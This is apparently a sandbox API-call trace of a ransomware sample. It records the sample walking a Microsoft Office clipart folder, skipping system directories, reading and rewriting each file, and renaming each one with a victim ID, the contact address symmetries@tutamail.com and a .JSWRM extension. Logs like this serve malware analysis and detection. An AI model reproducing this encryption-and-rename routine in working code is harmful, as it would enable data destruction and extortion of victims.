[0087.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0087.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0087.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0087.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0087.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0087.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.801] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200183.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200183.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200183.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200183.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0087.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0087.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0087.802] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebfae8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebfae8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebfae8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f7c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0200189.WMF", cAlternateFileName="")) returned 1 [0087.802] lstrcmpiW (lpString1="J0200189.WMF", lpString2=".") returned 1 [0087.802] lstrcmpiW (lpString1="J0200189.WMF", lpString2="..") returned 1 [0087.802] lstrcmpiW (lpString1="J0200189.WMF", lpString2="...") returned 1 [0087.802] lstrcmpiW (lpString1="J0200189.WMF", lpString2="windows") returned -1 [0087.802] lstrcmpiW (lpString1="J0200189.WMF", lpString2="recovery") returned -1 [0087.802] lstrcmpiW (lpString1="J0200189.WMF", lpString2="perflogs") returned -1 [0087.802] lstrcmpiW (lpString1="J0200189.WMF", lpString2="documents and settings") returned 1 [0087.802] lstrcmpiW (lpString1="J0200189.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.802] lstrcmpiW (lpString1="J0200189.WMF", lpString2="system volume information") returned -1 [0087.802] lstrcmpiW (lpString1="J0200189.WMF", lpString2="msocache") returned -1 [0087.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0087.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200189.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200189.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0200189.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0087.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0087.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200189.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200189.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0200189.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0087.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0087.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0087.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.802] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0087.802] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200189.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200189.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.803] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8060) returned 1 [0087.803] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f70) returned 0x205850 [0087.803] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1f70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1f70, lpOverlapped=0x0) returned 1 [0087.805] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.805] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1f70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1f70, lpOverlapped=0x0) returned 1 [0087.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0087.805] CloseHandle (hObject=0x314) returned 1 [0087.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0087.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0087.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0087.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0087.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0087.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0087.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.806] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200189.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200189.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200189.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200189.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0087.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0087.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0087.807] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebd4c33, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebd4c33, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebd4c33, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7a46, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0200273.WMF", cAlternateFileName="")) returned 1 [0087.807] lstrcmpiW (lpString1="J0200273.WMF", lpString2=".") returned 1 [0087.807] lstrcmpiW (lpString1="J0200273.WMF", lpString2="..") returned 1 [0087.807] lstrcmpiW (lpString1="J0200273.WMF", lpString2="...") returned 1 [0087.807] lstrcmpiW (lpString1="J0200273.WMF", lpString2="windows") returned -1 [0087.807] lstrcmpiW (lpString1="J0200273.WMF", lpString2="recovery") returned -1 [0087.807] lstrcmpiW (lpString1="J0200273.WMF", lpString2="perflogs") returned -1 [0087.807] lstrcmpiW (lpString1="J0200273.WMF", lpString2="documents and settings") returned 1 [0087.807] lstrcmpiW (lpString1="J0200273.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.807] lstrcmpiW (lpString1="J0200273.WMF", lpString2="system volume information") returned -1 [0087.807] lstrcmpiW (lpString1="J0200273.WMF", lpString2="msocache") returned -1 [0087.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0087.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200273.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200273.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0200273.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0087.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0087.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200273.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200273.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0200273.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0087.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0087.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0087.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0087.808] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200273.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200273.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.808] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31302) returned 1 [0087.808] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7a40) returned 0x24d210 [0087.808] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7a40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7a40, lpOverlapped=0x0) returned 1 [0087.812] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.812] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7a40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7a40, lpOverlapped=0x0) returned 1 [0087.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.813] CloseHandle (hObject=0x314) returned 1 [0087.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0087.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0087.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0087.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0087.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0087.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0087.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.813] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200273.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200273.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200273.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200273.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0087.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0087.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0087.814] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebfae8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebfae8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebfae8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4c0a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0200279.WMF", cAlternateFileName="")) returned 1 [0087.814] lstrcmpiW (lpString1="J0200279.WMF", lpString2=".") returned 1 [0087.814] lstrcmpiW (lpString1="J0200279.WMF", lpString2="..") returned 1 [0087.814] lstrcmpiW (lpString1="J0200279.WMF", lpString2="...") returned 1 [0087.814] lstrcmpiW (lpString1="J0200279.WMF", lpString2="windows") returned -1 [0087.814] lstrcmpiW (lpString1="J0200279.WMF", lpString2="recovery") returned -1 [0087.814] lstrcmpiW (lpString1="J0200279.WMF", lpString2="perflogs") returned -1 [0087.814] lstrcmpiW (lpString1="J0200279.WMF", lpString2="documents and settings") returned 1 [0087.814] lstrcmpiW (lpString1="J0200279.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.815] lstrcmpiW (lpString1="J0200279.WMF", lpString2="system volume information") returned -1 [0087.815] lstrcmpiW (lpString1="J0200279.WMF", lpString2="msocache") returned -1 [0087.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0087.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200279.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200279.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0200279.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0087.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0087.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200279.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0200279.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0200279.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0087.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0087.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0087.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0087.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200279.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200279.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.816] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19466) returned 1 [0087.816] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4c00) returned 0x24d210 [0087.817] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4c00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4c00, lpOverlapped=0x0) returned 1 [0087.820] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.820] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4c00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4c00, lpOverlapped=0x0) returned 1 [0087.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.820] CloseHandle (hObject=0x314) returned 1 [0087.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0087.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0087.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0087.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0087.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0087.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0087.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.820] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200279.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200279.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200279.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200279.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0087.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0087.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 